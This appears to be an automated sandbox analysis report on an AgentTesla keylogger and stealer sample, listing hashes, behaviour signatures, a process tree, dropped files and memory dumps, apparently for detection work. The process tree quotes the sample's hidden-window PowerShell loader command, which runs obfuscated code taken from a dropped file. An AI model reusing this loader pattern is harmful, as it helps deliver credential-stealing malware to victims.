Overview

overview

10

Static

static

3

8b1a3325ab...49.exe

windows7-x64

8

8b1a3325ab...49.exe

windows10-2004-x64

10

$PLUGINSDI...ec.dll

windows7-x64

3

$PLUGINSDI...ec.dll

windows10-2004-x64

3

Analysis

  • max time kernel
    98s
  • max time network
    142s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    17/01/2025, 01:27

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    8b1a3325abed1a5e86ef9759aa90644c9a46d4baa806a3be057ce8b5c4de7749.exe

  • Size

    675KB

  • MD5

    1fbec4d33c795d74d3fd1af8a82aff53

  • SHA1

    b508f538024b04aa708bfc4d11527ec9c853be92

  • SHA256

    8b1a3325abed1a5e86ef9759aa90644c9a46d4baa806a3be057ce8b5c4de7749

  • SHA512

    0b92aafb7fb60027af83ad483f043be0e6fa460f546cda31652b6e7d0232bb4b01e612ca86a8bd7b2765d0a8b5f2b72c9512191a87654f3a5b3cf8d3e1036961

  • SSDEEP

    12288:4gkvgwxI9MhaNkrqsn/6DJ8EfnYiYiZh0AzRYb1gbMgfa:4gk1OnNCz/6NrYkuANYhgk

Score
10/10
agenttesladiscoveryexecutionkeyloggerspywarestealertrojan

Malware Config

Extracted

Family

agenttesla

Credentials

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Agenttesla family
    agenttesla
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

    execution
  • Loads dropped DLL 1 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 22 IoCs
  • Suspicious use of WriteProcessMemory 7 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\8b1a3325abed1a5e86ef9759aa90644c9a46d4baa806a3be057ce8b5c4de7749.exe
    "C:\Users\Admin\AppData\Local\Temp\8b1a3325abed1a5e86ef9759aa90644c9a46d4baa806a3be057ce8b5c4de7749.exe"
    1⤵
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:5048
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -windowstyle hidden "$Unitiveness=gc -raw 'C:\Users\Admin\AppData\Local\Temp\langskggedes\Udbrudt\forfreriske\Fortegningerne224.Tre';$Sequanian=$Unitiveness.SubString(72268,3);.$Sequanian($Unitiveness) "
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3228
      • C:\Windows\SysWOW64\msiexec.exe
        "C:\Windows\SysWOW64\msiexec.exe"
        3⤵
        • Blocklisted process makes network request
        • Suspicious use of NtCreateThreadExHideFromDebugger
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        PID:4776
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 4776 -s 1584
          4⤵
          • Program crash
          PID:3896
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4776 -ip 4776
    1⤵
      PID:2716

    Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_r0h1exv4.ekl.ps1
            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\langskggedes\Udbrudt\forfreriske\Circumambience.Har
            Filesize

            311KB

            MD5

            0cca4b877799abab1d5114219048001f

            SHA1

            3201ad6c905cde15c2fa33848584f707d8cfcb3d

            SHA256

            93c1a8b289175a24ac2258f01a7b3455e853e2c490021f28628f90d060170232

            SHA512

            543d744351cbe79c817585ca205a268c52adbf3fbde7044dc69225c387fc819dba1eb8eed9057fd3cd76844b41809610a9295e6bbbcb9e1d1fbda627f304dfc6

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\langskggedes\Udbrudt\forfreriske\Fortegningerne224.Tre
            Filesize

            70KB

            MD5

            1f675f5bd6e6ddb3b80498213ea9a0c7

            SHA1

            f1996984073ddd59532b87b34b293b1634808db6

            SHA256

            2b92e75250a7e20263bf8434461b0508af2f704ef7679411b348e90fd64163d0

            SHA512

            7a9b02eb1cbb65cb661ebe50fe351dd25019761be750702d65034b1ee5e7c0c6d0a7f52226cc3ce55b091987512b194f70fab3c296bae92e847addfcd2501e23

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\nsz9F3F.tmp\nsExec.dll
            Filesize

            7KB

            MD5

            59e487d0a38dce3f6be70d153d7b84a0

            SHA1

            0c2ca2fb13731c9f5c53d663dd3804a423736c45

            SHA256

            f19f36b3d8c9f78786eb2dc99d7c7ffbfa1c8236843f139c625a60fde3e6b4c3

            SHA512

            42c80f25e3e49a3a81ec20104feacfc9652410d50ef90020e61c889fb0e94b0e54e1214c37f205a9f180a56dc569628a62d2bed868ffceb3bb3bbbc842403735

            Download Submit

          • memory/3228-49-0x00000000741F0000-0x00000000749A0000-memory.dmp

            Filesize

            7.7MB

            Download

          • memory/3228-51-0x0000000007960000-0x000000000796A000-memory.dmp

            Filesize

            40KB

            Download

          • memory/3228-14-0x0000000005430000-0x0000000005452000-memory.dmp

            Filesize

            136KB

            Download

          • memory/3228-16-0x0000000005D80000-0x0000000005DE6000-memory.dmp

            Filesize

            408KB

            Download

          • memory/3228-11-0x00000000741F0000-0x00000000749A0000-memory.dmp

            Filesize

            7.7MB

            Download

          • memory/3228-15-0x0000000005D10000-0x0000000005D76000-memory.dmp

            Filesize

            408KB

            Download

          • memory/3228-26-0x0000000005FA0000-0x00000000062F4000-memory.dmp

            Filesize

            3.3MB

            Download

          • memory/3228-28-0x0000000006430000-0x000000000647C000-memory.dmp

            Filesize

            304KB

            Download

          • memory/3228-27-0x00000000063F0000-0x000000000640E000-memory.dmp

            Filesize

            120KB

            Download

          • memory/3228-29-0x0000000006960000-0x00000000069F6000-memory.dmp

            Filesize

            600KB

            Download

          • memory/3228-30-0x0000000006910000-0x000000000692A000-memory.dmp

            Filesize

            104KB

            Download

          • memory/3228-31-0x00000000073B0000-0x00000000073D2000-memory.dmp

            Filesize

            136KB

            Download

          • memory/3228-32-0x0000000007C40000-0x00000000081E4000-memory.dmp

            Filesize

            5.6MB

            Download

          • memory/3228-12-0x00000000054B0000-0x0000000005AD8000-memory.dmp

            Filesize

            6.2MB

            Download

          • memory/3228-34-0x0000000008870000-0x0000000008EEA000-memory.dmp

            Filesize

            6.5MB

            Download

          • memory/3228-35-0x00000000077F0000-0x0000000007822000-memory.dmp

            Filesize

            200KB

            Download

          • memory/3228-37-0x00000000741F0000-0x00000000749A0000-memory.dmp

            Filesize

            7.7MB

            Download

          • memory/3228-50-0x00000000741F0000-0x00000000749A0000-memory.dmp

            Filesize

            7.7MB

            Download

          • memory/3228-10-0x0000000004E40000-0x0000000004E76000-memory.dmp

            Filesize

            216KB

            Download

          • memory/3228-48-0x0000000007860000-0x0000000007903000-memory.dmp

            Filesize

            652KB

            Download

          • memory/3228-13-0x00000000741F0000-0x00000000749A0000-memory.dmp

            Filesize

            7.7MB

            Download

          • memory/3228-36-0x0000000070680000-0x00000000706CC000-memory.dmp

            Filesize

            304KB

            Download

          • memory/3228-47-0x0000000007830000-0x000000000784E000-memory.dmp

            Filesize

            120KB

            Download

          • memory/3228-52-0x0000000007AC0000-0x0000000007AD1000-memory.dmp

            Filesize

            68KB

            Download

          • memory/3228-53-0x0000000007B10000-0x0000000007B1E000-memory.dmp

            Filesize

            56KB

            Download

          • memory/3228-54-0x0000000007B20000-0x0000000007B34000-memory.dmp

            Filesize

            80KB

            Download

          • memory/3228-55-0x0000000007B60000-0x0000000007B7A000-memory.dmp

            Filesize

            104KB

            Download

          • memory/3228-56-0x0000000007B50000-0x0000000007B58000-memory.dmp

            Filesize

            32KB

            Download

          • memory/3228-57-0x0000000007B70000-0x0000000007B9A000-memory.dmp

            Filesize

            168KB

            Download

          • memory/3228-58-0x0000000007BB0000-0x0000000007BD4000-memory.dmp

            Filesize

            144KB

            Download

          • memory/3228-59-0x00000000741F0000-0x00000000749A0000-memory.dmp

            Filesize

            7.7MB

            Download

          • memory/3228-61-0x00000000741F0000-0x00000000749A0000-memory.dmp

            Filesize

            7.7MB

            Download

          • memory/3228-9-0x00000000741FE000-0x00000000741FF000-memory.dmp

            Filesize

            4KB

            Download

          • memory/3228-63-0x00000000741FE000-0x00000000741FF000-memory.dmp

            Filesize

            4KB

            Download

          • memory/3228-64-0x00000000741F0000-0x00000000749A0000-memory.dmp

            Filesize

            7.7MB

            Download

          • memory/3228-65-0x00000000741F0000-0x00000000749A0000-memory.dmp

            Filesize

            7.7MB

            Download

          • memory/3228-67-0x00000000741F0000-0x00000000749A0000-memory.dmp

            Filesize

            7.7MB

            Download

          • memory/3228-68-0x00000000741F0000-0x00000000749A0000-memory.dmp

            Filesize

            7.7MB

            Download

          • memory/3228-66-0x0000000008EF0000-0x000000000BFF4000-memory.dmp

            Filesize

            49.0MB

            Download

          • memory/3228-69-0x00000000741F0000-0x00000000749A0000-memory.dmp

            Filesize

            7.7MB

            Download

          • memory/3228-71-0x00000000741F0000-0x00000000749A0000-memory.dmp

            Filesize

            7.7MB

            Download

          • memory/3228-72-0x00000000741F0000-0x00000000749A0000-memory.dmp

            Filesize

            7.7MB

            Download

          • memory/4776-73-0x0000000000A00000-0x0000000001C54000-memory.dmp

            Filesize

            18.3MB

            Download